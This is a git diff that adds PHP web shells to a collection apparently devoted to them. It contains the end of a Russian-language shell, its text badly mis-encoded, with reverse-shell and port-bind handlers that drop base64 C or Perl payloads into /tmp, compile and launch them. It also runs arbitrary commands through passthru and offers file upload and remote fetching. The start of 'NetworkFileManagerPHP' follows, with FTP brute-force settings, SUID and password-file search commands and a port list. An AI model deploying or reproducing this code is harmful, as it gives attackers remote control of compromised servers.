+$perms = @fileperms($d."/".$dirs[$i]); +$owner = @fileowner($d."/".$dirs[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$dirs[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#aed7ff";}else{$color="#68adf2";} +$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>"; +$linkd=str_replace("//","/",$linkd); +echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>"; +} +} +for ($i=0;$i<sizeof($files);$i++) { +if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";} +else{$info="<font color=red><li>&nbsp;R</font>";} +$size=@filesize($d."/".$files[$i]); +$perms = @fileperms($d."/".$files[$i]); +$owner = @fileowner($d."/".$files[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$files[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$prava=perm($perms); +if($i%2){$color="#ccccff";}else{$color="#b0b0ff";} + +if ($size < 1024){$siz=$size.' b'; +}else{ +if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ +if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ +if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';} +}}} +echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='ؤîٌٍَï $prava. آëàنهëهِ $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>"; +} + +echo "</table></td></tr></table>"; +break; +// سٌٍàيîâê?لهêنîً?case "backconnect": +echo "<b>سٌٍàيîâê?لهêنîً?/ îٍêًûٍèه ïîًٍ?/b>"; +echo "<form name=bind method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>خٍêًûٍ?ïîًٍ </b>"; +echo "<input type=text name=port size=15 value=11457>&nbsp;"; +echo "<b>دàًîëü نëے نîٌٍَï?</b>"; +echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;"; +echo "<b>بٌïîëüçîâàٍü </b>"; +echo "<select size=\"1\" name=\"use\">"; +echo "<option value=\"Perl\">Perl</option>"; +echo "<option value=\"C\">C</option>"; +echo "</select>&nbsp;"; +echo "<input type=hidden name=dir value=".$dir.">"; +echo "<input type=submit name=submit value=خٍêًûٍ?"; +echo "</font>"; +echo "</form>"; + +echo "<b>سٌٍàيîâê?لهêنîً?/ لهêêîييهêٍ</b>"; +echo "<form name=back method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>IP-àنًه?</b>"; +echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;"; +echo "<b>دîًٍ </b>"; +echo "<input type=text name=port size=15 value=31337>&nbsp;"; +echo "<b>بٌïîëüçîâàٍü </b>"; +echo "<select size=\"1\" name=\"use\">"; +echo "<option value=\"Perl\">Perl</option>"; +echo "<option value=\"C\">C</option>"; +echo "</select>&nbsp;"; +echo "<input type=hidden name=dir value=".$dir.">"; +echo "<input type=submit name=submit value=آûïîëيèٍ?"; +echo "</font>"; +echo "</form>"; + + +/* port bind C */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + $w_file=fopen("/tmp/bd.c","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/bd /tmp/bd.c"); + unlink("/tmp/bd.c"); + $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bd"; + $err=0; + } +} + +/* port bind Perl */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/bdpl","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>خّèلêà! حه ىîمَ çàïèٌàٍü ?/tmp/</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_pl)); + fclose($w_file); + $bind_string="perl /tmp/bdpl ".$_POST['port']." &"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bdpl"; + $err=0; + } +} + +/* back connect Perl */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/back","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>خّèلêà! حه ىîمَ çàïèٌàٍü ?/tmp/</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect)); + fclose($w_file); + $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"رهé÷àٌ ٌêًèïٍ êîييهêٍèٌٍے ?".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} + +/* back connect C */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + $w_file=fopen("/tmp/back.c","ab+") or $err=1; + if($err==1) + { + echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>"; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/backc /tmp/back.c"); + unlink("/tmp/back.c"); + $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"رهé÷àٌ ٌêًèïٍ êîييهêٍèٌٍے ?".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} +echo "<font face=Verdana size=-2>آûïîëيهييàے êîىàين? <b>".$_POST['cmd']."</b></font></td></tr><tr><td>"; +echo "<b>"; +echo "<br>ذهçَëüٍà? "; +echo "<font color=red size=2"; +print "".passthru($_POST['cmd']).""; +echo "</font></b>"; +break; + +// Uploading +case "upload": + +echo <<<HTML +<b>اàمًَçêà ôàéëîâ</b> +<a href='$php_self?ac=massupload&d=$d&t=massupload'>* اàمًَçèٍ?لîëüّî?êîëè÷هٌٍâî ôàéëîâ *</a><br><br> +<table> +<form enctype="multipart/form-data" action="$self" method="POST"> +<input type="hidden" name="ac" value="upload"> +<tr> +<td>شàéë:</td> +<td><input size="48" name="file" type="file"></td> +</tr> +<tr> +<td>دàïê?</td> +<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="دîٌëàٍ?></td><br> +$tend +HTML; + +if (isset($_POST['path'])){ + +$uploadfile = $_POST['path'].$_FILES['file']['name']; +if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} + +if (copy($_FILES['file']['tmp_name'], $uploadfile)) { + echo "شàéë ٌَïهّي?çàمًَوهي ?ïàïê?$uploadfile\n"; + echo "بىے:" .$_FILES['file']['name']. "\n"; + echo "ذàçىهً:" .$_FILES['file']['size']. "\n"; + +} else { + print "حه َنà¸ٌٍے çàمًَçèٍ?ôàéë. بيôà:\n"; + print_r($_FILES); +} +} + + +echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post> +<b>اàمًَçêà ôàéëîâ ?َنàëهييîمî êîىïü‏ٍهًà:</b><br> + HTTP ïٍَü ?ôàéë? <br> +<input type='text' name='file3' value='http://' size=40><br> +حàçâàيèه ôàéë?èë?ïٍَü ?يàçâàيèه?ôàéë? <br> +<input type='text' name='file2' value='$docr/' size=40><br> +<input type='submit' value='اàمًَçèٍ?ôàéë'></form>"; + + +if (!isset($status)) downfiles(); + +else +{ + +$data = @implode("", file($file3)); +$fp = @fopen($file2, "wb"); +@fputs($fp, $data); +$ok = @fclose($fp); +if($ok) +{ +$size = filesize($file2)/1024; +$sizef = sprintf("%.2f", $size); + +print "<br><center>آû çàمًَçèë? <b>ôàéë <u>$file2</u> ًàçىهًîى</b> (".$sizef."êء) </center>"; +} +else +{ +print "<br><center><font color=red size = 2><b>خّèلêà çàمًَçêè ôàéë?/b></font></center>"; +} +} + + + +break; +// Tools +case "tools": +echo "<form method=post>أهيهًàِèے md5 ّèôً?br><input name=md5 size=30></form><br>"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5 ٌمهيهًèًîâàي:<br> ".md5($md5)."";} +echo "<br> +<form method=post>تîنèًîâàيè?نهêîنèًîâàيè?base64<br><input name=base64 size=30></form><br>"; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +تîنèًîâàيî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br> +ؤهêîنèًîâàيî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";} +echo "<br> +<form method=post>DES êîنèًîâàيè?<br><input name=des size=30></form><br>"; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "Des ٌمهيهًèًîâàي: <br>".crypt($des)."";} +echo "<br> +<form method=post>SHA1 êîنèًîâàيè?<br><input name=sha1 size=30></form><br>"; +if(@$_POST['sha1']){ +@$des=@$_POST['sha1']; +echo "SHA1 ٌمهيهًèًîâàي: <br>".sha1($sha1a)."";} + +echo "<form method=POST>"; +echo "html-êî?-> ّهٌٍيàنِàٍèًè÷يû?çيà÷هي?<br><input type=text name=data size=30>"; + + +if (isset($_POST['data'])) +{ +echo "<br><br><b>ذهçَëüٍà?<br></b>"; +$str=str_replace("%20","",$_POST['data']); +for($i=0;$i<strlen($str);$i++) +{ +$hex=dechex(ord($str[$i])); +if ($str[$i]=='&') echo "$str[$i]"; +else if ($str[$i]!='\\') echo "%$hex"; +} +} +exit; +break; +// Mass Uploading +case "massupload": + + +echo " +جàٌîâàے çàمًَçêà ôàéëîâ:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text1 size=43> <input type=file name=text11 size=43><br> +<input type=file name=text2 size=43> <input type=file name=text12 size=43><br> +<input type=file name=text3 size=43> <input type=file name=text13 size=43><br> +<input type=file name=text4 size=43> <input type=file name=text14 size=43><br> +<input type=file name=text5 size=43> <input type=file name=text15 size=43><br> +<input type=file name=text6 size=43> <input type=file name=text16 size=43><br> +<input type=file name=text7 size=43> <input type=file name=text17 size=43><br> +<input type=file name=text8 size=43> <input type=file name=text18 size=43><br> +<input type=file name=text9 size=43> <input type=file name=text19 size=43><br> +<input type=file name=text10 size=43> <input type=file name=text20 size=43><br> +<input name=where size=43 value='$docr'><br> +<input type=submit value=اàمًَçèٍ?name=massupload> +</form><br>"; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile1</i><br>";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile2</i><br>";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile3</i><br>";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile4</i><br>";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile5</i><br>";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile6</i><br>";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile7</i><br>";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile8</i><br>";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile9</i><br>";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile10</i><br>";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile11</i><br>";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile12</i><br>";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile13</i><br>";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile14</i><br>";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile15</i><br>";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile16</i><br>";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile17</i><br>";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile18</i><br>";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile19</i><br>";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "<i>اàمًَوهي? $uploadfile20</i><br>";} +} + +exit; +break; +case "selfremover": + print "<tr><td>"; +print "<font color=red face=verdana size=1>زû َâهًهي, ÷ٍ?ُî÷ه?َنàëèٍ?‎ٍîٍ ّهëë ?ٌهًâهً??<br> +<a href='$php_self?p=yes'>ؤà, ُî÷َ</a> | <a href='$php_self?'>حه? ïٌٍَ?هù?ïîلَنه?/a><br> +ءَنه?َنàëےٍü: <u>"; +$path=__FILE__; +print $path; +print " </u>?</td></tr></table>"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="شàéë يهâîçىîويî َنàëèٍ?!!"; +print "<tr><td><font color=red>شàéë $path يه َنàëهي !</td></tr>"; +}else{$hmm="سنàëهي";} +print "<script>alert('$path $hmm');</script>"; + +} +break; + + +?> + + + diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg new file mode 100644 index 0000000..18657e7 Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg differ diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db new file mode 100644 index 0000000..8f2476c Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/Thumbs.db differ diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg new file mode 100644 index 0000000..b482ff4 Binary files /dev/null and b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg differ diff --git a/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php new file mode 100644 index 0000000..a0cf326 --- /dev/null +++ b/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php @@ -0,0 +1,5603 @@ +<? + +if (ini_get('register_globals') != '1') { + + if (!empty($HTTP_POST_VARS)) + + extract($HTTP_POST_VARS); + + + + if (!empty($HTTP_GET_VARS)) + + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + + extract($HTTP_SERVER_VARS); + +} + + + +$use_md5=0; // Define use of MD5 crypt algoritm // + +$uname="1"; + +$upass="1"; + + + + + + +if ($action != "download" && $action != "view" ): + +?> + + + +<? + + + +/* Define your email for file send function*/ + +$demail ="effes2004@gmail.com"; + + + +/* config here */ + +$title="NetworkFileManagerPHP for channel #hack.ru"; + +$ver="1.7.private ([final_english_release])"; + +$sob="Belongs to <b><u>revers</u></b>"; + +$id="1337"; + + + +/* FTP-bruteforce */ + +$filename="/etc/passwd"; + +$ftp_server="localhost"; + +/* port scanner */ + +$min="1"; + +$max="65535"; + + + +/* Aliases */ + +$aliases=array( + +/* find all SUID files */ + +'find / -type f -perm -04000 -ls' => 'find all suid files' , + +/* find all SGID files */ + +'find / -type f -perm -02000 -ls' => 'find all sgid files', + +/* find all config.inc.php files */ + +'find / -type f -name config.inc.php' => 'find all config.inc.php files', + +/* find accesseable writeable directories and files*/ + +'find / -perm -2 -ls' => 'find writeable directories and files', + +'ls -la' => 'Current directory listing with rights access', + +'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password' + + + +); + + + +/* ports and services names */ + +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; + +$port[2] = "Management Utility"; + +$port[3] = "Compression Process"; + +$port[5] = "rje (Remote Job Entry)"; + +$port[7] = "echo"; + +$port[9] = "discard"; + +$port[11] = "systat"; + +$port[13] = "daytime"; + +$port[15] = "netstat"; + +$port[17] = "quote of the day"; + +$port[18] = "send/rwp"; + +$port[19] = "character generator"; + +$port[20] = "ftp-data"; + +$port[21] = "ftp"; + +$port[22] = "ssh, pcAnywhere"; + +$port[23] = "Telnet"; + +$port[25] = "SMTP (Simple Mail Transfer)"; + +$port[27] = "ETRN (NSW User System FE)"; + +$port[29] = "MSG ICP"; + +$port[31] = "MSG Authentication"; + +$port[33] = "dsp (Display Support Protocol)"; + +$port[37] = "time"; + +$port[38] = "RAP (Route Access Protocol)"; + +$port[39] = "rlp (Resource Location Protocol)"; + +$port[41] = "Graphics"; + +$port[42] = "nameserv, WINS"; + +$port[43] = "whois, nickname"; + +$port[44] = "MPM FLAGS Protocol"; + +$port[45] = "Message Processing Module [recv]"; + +$port[46] = "MPM [default send]"; + +$port[47] = "NI FTP"; + +$port[48] = "Digital Audit Daemon"; + +$port[49] = "TACACS, Login Host Protocol"; + +$port[50] = "RMCP, re-mail-ck"; + +$port[53] = "DNS"; + +$port[57] = "MTP (any private terminal access)"; + +$port[59] = "NFILE"; + +$port[60] = "Unassigned"; + +$port[61] = "NI MAIL"; + +$port[62] = "ACA Services"; + +$port[63] = "whois++"; + +$port[64] = "Communications Integrator (CI)"; + +$port[65] = "TACACS-Database Service"; + +$port[66] = "Oracle SQL*NET"; + +$port[67] = "bootps (Bootstrap Protocol Server)"; + +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; + +$port[69] = "Trivial File Transfer Protocol (tftp)"; + +$port[70] = "Gopher"; + +$port[71] = "Remote Job Service"; + +$port[72] = "Remote Job Service"; + +$port[73] = "Remote Job Service"; + +$port[74] = "Remote Job Service"; + +$port[75] = "any private dial out service"; + +$port[76] = "Distributed External Object Store"; + +$port[77] = "any private RJE service"; + +$port[78] = "vettcp"; + +$port[79] = "finger"; + +$port[80] = "World Wide Web HTTP"; + +$port[81] = "HOSTS2 Name Serve"; + +$port[82] = "XFER Utility"; + +$port[83] = "MIT ML Device"; + +$port[84] = "Common Trace Facility"; + +$port[85] = "MIT ML Device"; + +$port[86] = "Micro Focus Cobol"; + +$port[87] = "any private terminal link"; + +$port[88] = "Kerberos, WWW"; + +$port[89] = "SU/MIT Telnet Gateway"; + +$port[90] = "DNSIX Securit Attribute Token Map"; + +$port[91] = "MIT Dover Spooler"; + +$port[92] = "Network Printing Protocol"; + +$port[93] = "Device Control Protocol"; + +$port[94] = "Tivoli Object Dispatcher"; + +$port[95] = "supdup"; + +$port[96] = "DIXIE"; + +$port[98] = "linuxconf"; + +$port[99] = "Metagram Relay"; + +$port[100] = "[unauthorized use]"; + +$port[101] = "HOSTNAME"; + +$port[102] = "ISO, X.400, ITOT"; + +$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et"; + +$port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; + +$port[105] = "CCSO name server protocol"; + +$port[106] = "poppassd"; + +$port[107] = "Remote Telnet Service"; + +$port[108] = "SNA Gateway Access Server"; + +$port[109] = "POP2"; + +$port[110] = "POP3"; + +$port[111] = "Sun RPC Portmapper"; + +$port[112] = "McIDAS Data Transmission Protocol"; + +$port[113] = "Authentication Service"; + +$port[115] = "sftp (Simple File Transfer Protocol)"; + +$port[116] = "ANSA REX Notify"; + +$port[117] = "UUCP Path Service"; + +$port[118] = "SQL Services"; + +$port[119] = "NNTP"; + +$port[120] = "CFDP"; + +$port[123] = "NTP"; + +$port[124] = "SecureID"; + +$port[129] = "PWDGEN"; + +$port[133] = "statsrv"; + +$port[135] = "loc-srv/epmap"; + +$port[137] = "netbios-ns"; + +$port[138] = "netbios-dgm (UDP)"; + +$port[139] = "NetBIOS"; + +$port[143] = "IMAP"; + +$port[144] = "NewS"; + +$port[150] = "SQL-NET"; + +$port[152] = "BFTP"; + +$port[153] = "SGMP"; + +$port[156] = "SQL Service"; + +$port[161] = "SNMP"; + +$port[175] = "vmnet"; + +$port[177] = "XDMCP"; + +$port[178] = "NextStep Window Server"; + +$port[179] = "BGP"; + +$port[180] = "SLmail admin"; + +$port[199] = "smux"; + +$port[210] = "Z39.50"; + +$port[213] = "IPX"; + +$port[218] = "MPP"; + +$port[220] = "IMAP3"; + +$port[256] = "RAP"; + +$port[257] = "Secure Electronic Transaction"; + +$port[258] = "Yak Winsock Personal Chat"; + +$port[259] = "ESRO"; + +$port[264] = "FW1_topo"; + +$port[311] = "Apple WebAdmin"; + +$port[350] = "MATIP type A"; + +$port[351] = "MATIP type B"; + +$port[363] = "RSVP tunnel"; + +$port[366] = "ODMR (On-Demand Mail Relay)"; + +$port[371] = "Clearcase"; + +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; + +$port[389] = "LDAP"; + +$port[407] = "Timbuktu"; + +$port[427] = "Server Location"; + +$port[434] = "Mobile IP"; + +$port[443] = "ssl"; + +$port[444] = "snpp, Simple Network Paging Protocol"; + +$port[445] = "SMB"; + +$port[458] = "QuickTime TV/Conferencing"; + +$port[468] = "Photuris"; + +$port[475] = "tcpnethaspsrv"; + +$port[500] = "ISAKMP, pluto"; + +$port[511] = "mynet-as"; + +$port[512] = "biff, rexec"; + +$port[513] = "who, rlogin"; + +$port[514] = "syslog, rsh"; + +$port[515] = "lp, lpr, line printer"; + +$port[517] = "talk"; + +$port[520] = "RIP (Routing Information Protocol)"; + +$port[521] = "RIPng"; + +$port[522] = "ULS"; + +$port[531] = "IRC"; + +$port[543] = "KLogin, AppleShare over IP"; + +$port[545] = "QuickTime"; + +$port[548] = "AFP"; + +$port[554] = "Real Time Streaming Protocol"; + +$port[555] = "phAse Zero"; + +$port[563] = "NNTP over SSL"; + +$port[575] = "VEMMI"; + +$port[581] = "Bundle Discovery Protocol"; + +$port[593] = "MS-RPC"; + +$port[608] = "SIFT/UFT"; + +$port[626] = "Apple ASIA"; + +$port[631] = "IPP (Internet Printing Protocol)"; + +$port[635] = "RLZ DBase"; + +$port[636] = "sldap"; + +$port[642] = "EMSD"; + +$port[648] = "RRP (NSI Registry Registrar Protocol)"; + +$port[655] = "tinc"; + +$port[660] = "Apple MacOS Server Admin"; + +$port[666] = "Doom"; + +$port[674] = "ACAP"; + +$port[687] = "AppleShare IP Registry"; + +$port[700] = "buddyphone"; + +$port[705] = "AgentX for SNMP"; + +$port[901] = "swat, realsecure"; + +$port[993] = "s-imap"; + +$port[995] = "s-pop"; + +$port[1024] = "Reserved"; + +$port[1025] = "network blackjack"; + +$port[1062] = "Veracity"; + +$port[1080] = "SOCKS"; + +$port[1085] = "WebObjects"; + +$port[1227] = "DNS2Go"; + +$port[1243] = "SubSeven"; + +$port[1338] = "Millennium Worm"; + +$port[1352] = "Lotus Notes"; + +$port[1381] = "Apple Network License Manager"; + +$port[1417] = "Timbuktu Service 1 Port"; + +$port[1418] = "Timbuktu Service 2 Port"; + +$port[1419] = "Timbuktu Service 3 Port"; + +$port[1420] = "Timbuktu Service 4 Port"; + +$port[1433] = "Microsoft SQL Server"; + +$port[1434] = "Microsoft SQL Monitor"; + +$port[1477] = "ms-sna-server"; + +$port[1478] = "ms-sna-base"; + +$port[1490] = "insitu-conf"; + +$port[1494] = "Citrix ICA Protocol"; + +$port[1498] = "Watcom-SQL"; + +$port[1500] = "VLSI License Manager"; + +$port[1503] = "T.120"; + +$port[1521] = "Oracle SQL"; + +$port[1522] = "Ricardo North America License Manager"; + +$port[1524] = "ingres"; + +$port[1525] = "prospero"; + +$port[1526] = "prospero"; + +$port[1527] = "tlisrv"; + +$port[1529] = "oracle"; + +$port[1547] = "laplink"; + +$port[1604] = "Citrix ICA, MS Terminal Server"; + +$port[1645] = "RADIUS Authentication"; + +$port[1646] = "RADIUS Accounting"; + +$port[1680] = "Carbon Copy"; + +$port[1701] = "L2TP/LSF"; + +$port[1717] = "Convoy"; + +$port[1720] = "H.323/Q.931"; + +$port[1723] = "PPTP control port"; + +$port[1731] = "MSICCP"; + +$port[1755] = "Windows Media .asf"; + +$port[1758] = "TFTP multicast"; + +$port[1761] = "cft-0"; + +$port[1762] = "cft-1"; + +$port[1763] = "cft-2"; + +$port[1764] = "cft-3"; + +$port[1765] = "cft-4"; + +$port[1766] = "cft-5"; + +$port[1767] = "cft-6"; + +$port[1808] = "Oracle-VP2"; + +$port[1812] = "RADIUS server"; + +$port[1813] = "RADIUS accounting"; + +$port[1818] = "ETFTP"; + +$port[1973] = "DLSw DCAP/DRAP"; + +$port[1985] = "HSRP"; + +$port[1999] = "Cisco AUTH"; + +$port[2001] = "glimpse"; + +$port[2049] = "NFS"; + +$port[2064] = "distributed.net"; + +$port[2065] = "DLSw"; + +$port[2066] = "DLSw"; + +$port[2106] = "MZAP"; + +$port[2140] = "DeepThroat"; + +$port[2301] = "Compaq Insight Management Web Agents"; + +$port[2327] = "Netscape Conference"; + +$port[2336] = "Apple UG Control"; + +$port[2427] = "MGCP gateway"; + +$port[2504] = "WLBS"; + +$port[2535] = "MADCAP"; + +$port[2543] = "sip"; + +$port[2592] = "netrek"; + +$port[2727] = "MGCP call agent"; + +$port[2628] = "DICT"; + +$port[2998] = "ISS Real Secure Console Service Port"; + +$port[3000] = "Firstclass"; + +$port[3001] = "Redwood Broker"; + +$port[3031] = "Apple AgentVU"; + +$port[3128] = "squid"; + +$port[3130] = "ICP"; + +$port[3150] = "DeepThroat"; + +$port[3264] = "ccmail"; + +$port[3283] = "Apple NetAssitant"; + +$port[3288] = "COPS"; + +$port[3305] = "ODETTE"; + +$port[3306] = "mySQL"; + +$port[3389] = "RDP Protocol (Terminal Server)"; + +$port[3521] = "netrek"; + +$port[4000] = "icq, command-n-conquer and shell nfm"; + +$port[4321] = "rwhois"; + +$port[4333] = "mSQL"; + +$port[4444] = "KRB524"; + +$port[4827] = "HTCP"; + +$port[5002] = "radio free ethernet"; + +$port[5004] = "RTP"; + +$port[5005] = "RTP"; + +$port[5010] = "Yahoo! Messenger"; + +$port[5050] = "multimedia conference control tool"; + +$port[5060] = "SIP"; + +$port[5150] = "Ascend Tunnel Management Protocol"; + +$port[5190] = "AIM"; + +$port[5500] = "securid"; + +$port[5501] = "securidprop"; + 